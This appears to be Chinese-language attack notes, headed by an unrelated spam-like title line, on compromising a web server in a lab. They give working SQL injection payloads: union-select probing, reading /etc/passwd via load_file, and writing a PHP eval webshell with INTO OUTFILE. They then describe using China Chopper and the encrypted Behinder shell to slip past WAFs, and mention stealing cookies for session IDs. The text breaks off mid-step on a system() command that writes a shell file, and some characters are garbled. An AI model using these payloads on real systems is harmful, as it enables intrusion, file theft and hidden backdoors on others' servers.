想把自己做的網(wǎng)站放到網(wǎng)上軟件推廣方案經(jīng)典范文
找到了漏洞后,并且上傳了木馬之后才能使用的兩款工具
中國菜刀和冰蝎
想辦法獲取別人的cookie,cookie中有session-id
一、中國菜刀
1、必須提前已經(jīng)完成木馬植入然后才能使用
2、木馬必須是POST請求,參數(shù)自定義,在菜刀里給出正確的參數(shù)名。
是屬于輔助工具,并且菜刀的傳輸過程是明文傳輸?shù)?#xff0c;目前已經(jīng)被WAF進行防護了。
先看是否存在注入點,有下圖所示則表示存在注入點==》可以進行接下來的操作
http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,4,5,6
有文件,則說明可以讀任意路徑的文件
http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,(select load_file("/etc/passwd")),5,6
寫入一句話的木馬進行探測,如果嗅探成功后在進行大馬的上傳
http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,"<?php @eval($_POST[a]) ; ?>",5,6 into outfile "/opt/lampp/htdocs/security/temp/mm.php"
在post中寫入PHP的代碼,a=phpinfo();可以獲取你想要的配置信息,也可以用system函數(shù)來輸入命令
接下來就可以連接菜刀,使用菜刀來連接木馬然后就可以查看到服務(wù)器里面的東西了
使用wireshark進行抓包用來分析流量
假設(shè)菜刀被WAF擋了
二、Behinder冰蝎
冰蝎是加密傳輸,防火墻很難分析出流量特征,比較容易繞開防火墻。
所以需要先上傳一個冰蝎自己的帶加密功能的shell腳本,這個上傳shell的過程通常有以下幾種方式:
1)直接在命令行運行命令,按行用echo 寫入
a=system('echo "$post=file_get_contents("php://input");">> /opt/lampp/htdocs/security/temp/muma.php');